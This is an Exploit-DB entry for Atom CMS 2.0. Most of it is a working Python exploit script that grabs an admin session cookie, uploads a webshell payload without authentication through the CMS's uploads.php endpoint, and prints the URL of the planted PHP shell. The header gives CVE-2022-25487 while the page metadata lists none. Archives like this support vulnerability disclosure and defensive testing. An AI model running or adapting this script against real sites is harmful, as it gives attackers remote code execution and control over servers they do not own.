Atom CMS 2.0 - Remote Code Execution (RCE)

EDB-ID:

50840

CVE:

N/A




Platform:

PHP

Date:

2022-03-30


# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)
# Date: 22.03.2022
# Exploit Author: Ashish Koli (Shikari)
# Vendor Homepage: https://thedigitalcraft.com/
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Ubuntu 20.04.3 LTS
# CVE: CVE-2022-25487

# Description
This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.

# Usage : python3 exploit.py <IP> <Port> <atomcmspath>
# Example:  python3 exploit.py 127.0.0.1 80 /atom

# POC Exploit: https://youtu.be/qQrq-eEpswc
# Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link:
# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC

'''
Description:
A file upload functionality in Atom CMS 2.0 allows any
non-privileged user to gain access to the host through the uploaded files,
which may result in remote code execution.
'''

#!/usr/bin/python3
'''
Import required modules:
'''
import sys
import requests
import json
import time
import urllib.parse
import struct
import re
import string
import linecache



proxies = {
   'http': 'http://localhost:8080',
   'https': 'https://localhost:8080',
}

'''
User Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
atomcmspath = sys.argv[3]


'''
Get cookie
'''
session = requests.Session()
link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'
response = session.get(link)
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')

'''
Upload Webshell:
'''
# Construct Header:
header1 = {
    'Host': target_ip,    
    'Accept': 'application/json',
    'Cache-Control': 'no-cache',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
    'Origin': 'http://' + target_ip,
    'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cookie': cookie,
    'Connection': 'close',
    
}


# loading Webshell payload: 
path = 'shell.txt'
fp = open(path,'rb')
data= fp.read()


# Uploading Webshell:
link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'
upload = requests.post(link_upload, headers=header1, data=data)

p=upload.text
x = re.sub("\s", "\n", p)
y = x.replace("1<br>Unknown", "null")
z = re.sub('[^0-9]', '', y)

'''
Finish:
'''
print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')
print('')